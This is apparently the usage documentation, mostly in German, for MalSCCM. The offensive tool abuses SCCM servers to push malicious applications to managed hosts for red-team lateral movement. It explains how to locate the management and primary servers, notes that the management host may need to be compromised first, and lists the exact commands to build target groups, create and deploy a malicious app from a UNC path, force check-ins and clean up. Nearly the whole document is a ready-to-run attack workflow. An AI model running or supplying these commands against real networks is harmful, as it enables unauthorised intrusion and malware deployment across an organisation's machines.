
SCCM-Server missbrauchen, um schädliche Anwendungen auf verwalteten Hosts für laterale Bewegung und Red-Team-Operationen bereitzustellen.
Dieses Tool ermöglicht es Ihnen, lokale oder entfernte SCCM-Server auszunutzen, um bösartige Anwendungen auf von ihnen verwalteten Hosts bereitzustellen. Um dieses Tool zu verwenden, muss Ihr aktueller Prozess über Administratorrechte auf dem SCCM-Server verfügen.
Typischerweise befinden sich bei SCCM-Bereitstellungen entweder der Management-Server und der primäre Server auf demselben Host. In diesem Fall kann der vom locate-Befehl zurückgegebene Host als primärer Server verwendet werden.
Ist dies nicht der Fall, müssen Sie den mit locate zurückgegebenen Management-Host kompromittieren, damit Sie locate erneut auf diesem Host ausführen und den Hostnamen des primären Servers erhalten können. Sobald Sie dies und Administratorzugriff haben, kann es losgehen!
Weitere Informationen zur Verwendung des Tools finden Sie im folgenden Blog.
Großer Dank gilt PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM), auf dem dies alles basiert. Dies wäre ohne die Arbeit von @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation nicht möglich gewesen.
Commands listed below have optional parameters in <>.
Attempt to find the SCCM management and primary servers:
MalSCCM.exe locate
Inspect the primary server to gather SCCM information:
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
Create/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
Force devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>